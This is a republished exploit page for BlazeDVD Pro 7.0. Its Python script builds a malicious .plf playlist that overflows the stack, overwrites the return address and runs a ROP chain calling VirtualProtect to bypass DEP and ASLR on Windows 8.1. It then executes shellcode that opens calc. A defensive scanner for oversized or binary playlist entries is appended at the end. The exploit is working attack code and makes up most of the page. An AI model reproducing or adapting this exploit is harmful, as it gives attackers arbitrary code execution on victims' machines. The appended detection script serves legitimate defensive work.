BlazeDVD Pro 7.0 - (.plf) Stack Based Buffer Overflow (Direct RET)
Source: vfocus.net  Author: Giovanni  Published: 2014-08-14
# BlazeDVD Pro v7.0 - (.plf) Stack Based Buffer Overflow (direct RET) - ASLR/DEP bypass on Win8.1 Pro
# Date: Mon, Aug 11 2014 12:58:06 GMT
# Exploit Author: Giovanni Bartolomucci
# Vendor Homepage: http://www.blazevideo.com/
# Software Link: http://www.blazevideo.com/download/BlazeDVDProSetup.exe
# Version: 7.0.0.0
# Tested on: Windows 8.1 Pro
# h/t to corelanc0d3r and b33f for their tutorials
  
#!/usr/bin/python
   
import sys, struct
   
file = "calc.plf"              # playlist file that BlazeDVD will open

junk1   = "\x41"*260           # filler up to the saved return address
neweip  = "\x5b\x51\x32\x60"   # 0x6032515b overwrites the saved return address (direct RET)
junk2   = "\x41"*24            # filler between the overwritten RET and the start of the ROP chain
  
rop =  "\x41\x47\x32\x60" # POP EBP # RETN [Configuration.dll]
rop += "\xb5\x59\x33\x60" # &(PUSH ESP # RET 0x0C) [Configuration.dll]
rop += "\xf6\x07\x33\x60" # POP EAX # RET [Configuration.dll]
rop += "\x91\x11\x11\x11" # Minuend 0x11111191: after SUB EAX,ECX it becomes 0x00000080
rop += "\x39\x03\x33\x60" # POP ECX # RETN [Configuration.dll]
rop += "\x11\x11\x11\x11" # Value to subtract
rop += "\xda\x6d\x32\x60" # SUB EAX,ECX # RETN [Configuration.dll]
rop += "\x7d\x41\x32\x60" # XCHG EAX,EBX # XOR AL,60 # RETN [Configuration.dll]
rop += "\xf6\x07\x33\x60" # POP EAX # RETN [Configuration.dll]
rop += "\x47\x98\x31\x60" # Junk R address
rop += "\x47\x98\x31\x60" # POP EDX # ADD AL,BYTE PTR ES:[EAX] # NOP # NOP # NOP # NOP # NOP # MOV EAX,Configur.60346A70 # RETN [Configuration.dll]
rop += "\x51\x11\x11\x11" # Minuend 0x11111151: after SUB EDX,EAX it becomes 0x00000040
rop += "\xf6\x07\x33\x60" # POP EAX # RETN [Configuration.dll]
rop += "\x11\x11\x11\x11" # Value to subtract
rop += "\x78\x8b\x30\x60" # SUB EDX,EAX # XOR EAX,EAX # CMP ECX,EDX # SETG AL # RETN 0x04 [Configuration.dll]
rop += "\x8c\xf0\x33\x60" # POP ECX # RETN [Configuration.dll]
rop += "\x41\x41\x41\x41" # Junk
rop += "\x0b\x17\x36\x60" # & Writable location [Configuration.dll]
rop += "\xee\x78\x32\x60" # POP EDI # RETN [Configuration.dll]
rop += "\x09\x48\x32\x60" # RETN (ROP NOP) [Configuration.dll]
rop += "\x65\x08\x33\x60" # POP EAX # RETN [Configuration.dll]
rop += "\xcc\x42\x05\x64" # ptr to &VirtualProtect() [IAT MediaPlayerCtrl.dll]
rop += "\xed\xd6\x33\x60" # MOV ESI,DWORD PTR DS:[EAX] # RETN [Configuration.dll]
rop += "\xa2\x92\x32\x60" # POP EAX # RETN [Configuration.dll]
rop += "\x90\x90\x90\x90" # NOP
rop += "\x28\xc3\x33\x60" # PUSHAD # RETN [Configuration.dll]
  
shellcode = ("\x66\x81\xE4\xFC\xFF\x31\xD2\x52\x68\x63"
             "\x61\x6C\x63\x89\xE6\x52\x56\x64\x8B\x72"
             "\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30"
             "\x8B\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78"
             "\x8B\x74\x1F\x20\x01\xFE\x8B\x4C\x1F\x24"
             "\x01\xF9\x42\xAD\x81\x3C\x07\x57\x69\x6E"
             "\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
             "\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7\xCC")
  
exploit = junk1 + neweip + junk2 + rop + shellcode
   
writeFile = open(file, "wb")   # binary mode so no byte of the payload is translated
writeFile.write(exploit)
writeFile.close()
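Added here as a defender-side example (Python 3, not part of the original exploit or of BlazeDVD): a triage script that flags playlist entries that are too long or too binary to be a media path. It assumes a .plf file is a line-oriented text playlist, takes the 260-byte offset of the saved return address from the junk1 length in the exploit above, and treats the 255-byte entry limit and both sample files as constructed.

```python
import string
import sys

# Bytes that can appear in an ordinary text playlist entry.
PRINTABLE = set(string.printable.encode("ascii"))
# Heuristic limit for one playlist entry (assumption: real media paths are shorter).
MAX_ENTRY_LEN = 255
# Offset of the saved return address, taken from the exploit above (len(junk1) == 260).
RET_OFFSET = 260


def scan_plf(data):
    """Scan the raw bytes of a .plf playlist and return one finding per suspicious line."""
    findings = []
    for lineno, line in enumerate(data.split(b"\n"), 1):
        line = line.rstrip(b"\r")
        if not line:
            continue
        non_printable = sum(1 for b in line if b not in PRINTABLE)
        if len(line) <= MAX_ENTRY_LEN and non_printable == 0:
            continue
        finding = {"line": lineno, "length": len(line), "non_printable": non_printable}
        if len(line) >= RET_OFFSET + 4:
            # The 4 bytes at the overflow offset are what would land in EIP (little-endian).
            finding["ret_overwrite"] = int.from_bytes(line[RET_OFFSET:RET_OFFSET + 4], "little")
        findings.append(finding)
    return findings


# Constructed samples: a benign playlist and one laid out like the exploit above
# (260 filler bytes, the page's return-address bytes, 24 more filler bytes, then a
# few non-printable bytes standing in for the ROP chain and shellcode).
BENIGN = b"C:\\Videos\\intro.mp4\r\nD:\\DVD\\VIDEO_TS\\VTS_01_1.VOB\r\n"
MALICIOUS = b"A" * 260 + b"\x5b\x51\x32\x60" + b"A" * 24 + b"\x90\x90\xcc"

if __name__ == "__main__":
    # With file paths on the command line the real files are scanned; without, the samples are.
    samples = [(p, open(p, "rb").read()) for p in sys.argv[1:]]
    samples = samples or [("<benign>", BENIGN), ("<malicious>", MALICIOUS)]
    for name, data in samples:
        for f in scan_plf(data):
            eip = f.get("ret_overwrite")
            print("%s: line %d is %d bytes with %d non-printable bytes%s" % (
                name, f["line"], f["length"], f["non_printable"],
                "" if eip is None else ", bytes at offset %d = 0x%08x" % (RET_OFFSET, eip)))
```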

 